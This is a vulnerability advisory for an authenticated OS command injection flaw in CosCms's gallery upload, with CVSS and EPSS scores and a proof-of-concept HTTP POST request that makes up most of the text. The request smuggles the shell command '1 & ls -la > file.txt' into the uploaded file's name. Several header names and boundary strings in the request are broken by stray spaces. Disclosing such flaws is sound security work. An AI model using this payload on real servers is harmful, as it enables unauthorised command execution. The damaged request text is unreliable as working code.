8.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:S/C:C/I:C/A:C
0.029 Low
EPSS
Percentile
89.7%
High-Tech Bridge Security Research Lab discovered vulnerability in CosCms, which can be exploited to execute arbitrary OS commands on web server where the vulnerable application is hosted.
POST /gallery/upload/index HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------21456260222104
Content-Length: 970
-----------------------------21456260222104
Content-Disposition: form-data; name=“title”
1
-----------------------------21456260222104
Content-Disp osition: form-data; name=“image_add”
1
-----------------------------21456260222104
Content- Disposition: form-data; name=“description”
1
-----------------------------21456260222104
Conten t-Disposition: form-data; name=“tags”
-----------------------------21456260222104
Content-Dispos ition: form-data; name=“MAX_FILE_SIZE”
100000000
-----------------------------214562602221 04
Content-Disposition: form-data; name=“APC_UPLOAD_PROGRESS”
511ad0922b50f
-----------------------------21 456260222104
Content-Disposition: form-data; name=“file”; filename=“1 & ls -la > file.txt”
Content-Type: application/octet-stream
1
-----------------------------21456260222104
Content-Disposition: form-data; name=“submit”
Update
-----------------------------21456260222104–
Successful exploitation of this vulnerability requires an attacker to be logged-in and have privileges to upload files. User registration is disabled by default.